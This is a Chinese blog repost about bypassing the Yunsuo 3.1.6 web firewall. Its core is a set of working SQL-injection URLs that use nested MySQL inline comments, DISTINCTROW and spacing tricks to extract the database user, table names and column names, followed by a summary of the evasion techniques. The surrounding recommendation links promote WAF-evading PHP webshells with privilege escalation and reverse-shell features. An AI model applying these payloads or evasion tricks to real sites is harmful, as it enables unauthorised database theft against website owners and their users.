过云锁php大马,过云锁注入技巧 | CN-SEC 中文网

最新推荐文章于 2022-06-01 16:31:46 发布
最新推荐文章于 2022-06-01 16:31:46 发布
阅读量226 收藏 1
点赞数
文章标签: 过云锁php大马
本文介绍了在Windows Server 2003上,Apache和PHP环境下,如何绕过云锁3.1.6版本的正则检查。通过利用多重内联注释和特定的SQL注入payload,如DISTINCTROW和函数间隔空格,可以避开安全防护。这些payload包括对信息表的查询,展示了攻击者可能的渗透路径。
摘要由CSDN通过智能技术生成

摘要

win03 + apache + php + 云锁最新版win_3.1.6 第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。

这里主要介绍下如何绕过正则。

先贴payload:

ec6208d4be5bce0a84e22984a688cc09.png

环境

win03 + apache + php + 云锁最新版win_3.1.6

绕过

第一种方法就不多说了,网上很早就出来了,检测post后忽略get,从而被绕过。

这里主要介绍下如何绕过正则。

先贴payload:

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3– -

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,user (),3– -

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,table_name,/Nfrom information_schema.tables where table_schema='blog' limit 1 offset 1– -

https://www.0dayhack.com/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select/N,column_name,/Nfrom information_schema.columns where table_name='users' limit 1 offset 1– -

技巧

1. 多重内联(/*!*/)+额外关键字(DISTINCTROW)

union select => /*!40000/*!30000union*/DISTINCTROW select

2. 函数和括号间增加空白符

user() => user ()

3.

select 1,table_name,3 => select/N,table_name,/Nfrom

忧伤过半
关注
STM32+华为云IOT设计的动态密码锁
05-30 7919
设计了一款物联网智能电子密码锁,以STM32单片机为主控制器,由触摸矩阵键盘、ESP8266、步进电机等模块组成,具有远程控制、随机密码生成等功能。
第72讲:MySQL数据库锁机制剖析:行级锁、间隙锁与临键锁详解及应用指南
最新发布
江晓龙的博客
11-30 1万+
首先我们来查询一下xscjb表的数据,可以看到主键8-13这个范围内没有其他数据,此时我们开启一个事务A来修改主键为10的数据,主键为10的数据不存在,并处于8-13的间隙内,此时就会产生一个间隙锁,间隙锁的范围就是8-13,可以从lock_data这里看到最大的间隙范围值,对应的最小间隙范围值就是距离13最近的一个值,也就是8-13,这时开启了事务B,事务B想要插入xh为11的数据,则会被阻塞,因为xh为11这个值处于8-13的间隙内,因此会被阻塞,当事务A提交后,阻塞才会被释放。在RR隔离级别下支持。
2019最新过狗过,云锁,360等WAF的PHP免杀大马
02-02
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件
过云锁php大马,华夏名网某分站弱口令可Getshell(过云锁waf案例)
weixin_39776239的博客
03-10 219
直接进入正题吧,这次的站点是http://bbs.sudu.cn/弱口令:用户名admin 密码qwer进后台看了一下,是Discuz! X3.2 Release 20140603版本,从前台少的可怜的用户数量来看,未打补丁的可能性比较大,那就尝试getshell吧,参考WooYun: Discuz3.2后台文件包含漏洞可后台拿shell具体操作过程就不啰嗦了,这里面有个小细节,一定要把服务器...
云锁 php一句话,关于php一句话免杀的分析<转载>
weixin_33542924的博客
03-23 313
一开始想这样: 客户端用菜刀,密码cmd,url为test.php?ts7=assert 这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert 可以都用post: 在菜刀说明用ts7=assertpost附加数据. 这中间考虑了这些: ...
过云锁php木马,过waf的另类木马文件攻击方法
weixin_34260080的博客
03-12 456
很久没写文章了,继上次发先文章到今天已经很久了;很久没写文章了,继上次发先文章到今天已经很久了;今天突发异想;因为之前打了西湖论剑,遇到了宝塔的waf,最后也是过去了,便觉得另类的攻击方法值得写篇文章分享下;首先我打算分享几种。一:动态调用​首先,一些waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉,其实在...
正方教务系统新版php,正方教务系统最新sql注射漏洞修复 | CN-SEC 中文网
weixin_39979489的博客
04-13 4282
摘要你还再为考试挂科而烦恼么,你还再为大学里怎么要妹子电话而纠结么,你想快速找到学校里的漂亮妹子么,那么请看下文 1. 教室查询处有sql注射,如图你还再为考试挂科而烦恼么,你还再为大学里怎么要妹子电话而纠结么,你想快速找到学校里的漂亮妹子么,那么请看下文 1. 教室查询处有sql注射,如图1unionselectNULL,ownerfromall_tables爆出数据库2.找回密码存...
Java-Sec-Code 环境搭建
MZa1213123的博客
03-16 9184
一、Java Sec Code 介绍 对于学习Java漏洞代码来说,Java Sec Code是一个非常强大且友好的项目。 该项目也可以叫做Java Vulnerability Code(Java漏洞代码)。 每个漏洞类型代码默认存在安全漏洞(除非本身不存在漏洞),相关修复代码在注释里。 具体可查看每个漏洞代码和注释。 下载地址:https://github.com/JoyChou93/java-sec-code 二、搭建环境 IDEA 由于在 windows 对代码进行审计,方便 debu
Sec-Fetch-*请求头,了解下?
福禄网络研发团队的博客
10-27 1万+
如果你使用76+版本的chrome浏览器,通过开发者面板查看每个网络请求,会发现都有几个Sec-Fetch开头的请求头,例如访问百度首页https://www.baidu.com/的请求: Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 这是用来干嘛的呢,简单来说,就是网络请求的元数据描述,服务端根据这些补充数据进行细粒度的控制响应,换句话说,服务端可以精确判断请求的合法性,
php免杀大马
07-12
常用的php大马,可提权反弹。 常用提权大马常用的php大马,可提权反弹。 常用提权大马
PHP大马-php_mof SHELL.rar
11-17
nc反弹还需要再测试 PHP大马-php_mof SHELL.rar
PHP大马
12-24
php 木马的分析(加密破解) - 分析可以知道,此木马经过了base64进行了编码,然后进行压缩。虽然做了相关的保密措施,可是php代码要执行,其最终要生成php源代码,
比较不错的php大马
12-04
比较不错的php大马
wso_webshell_php_
10-01
Webshell
SQL注入10之防御
weixin_56218159的博客
06-01 414
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献 ...
PHP大马】定义、下载、使用、源码
热门推荐
06-01 2万+
PHP大马】适合第一次接触的
PHP大马后门分析
qq_17754023的博客
02-28 4119
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
PHP小马,大马实现分析编写
Love&Share
03-15 1万+
PHP工具开发 PHP小马 简单隐藏 登陆密码 实现写入文件 <?php $pass = '14e1b600b1fd579f47433b88e8d85291'; #123456 $get = $_GET['pass']; if (!empty($get)) { if (md5(md5($get))) { if (!empty($_POST)) { $path=$_POST['filepath']; $content=$_P
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值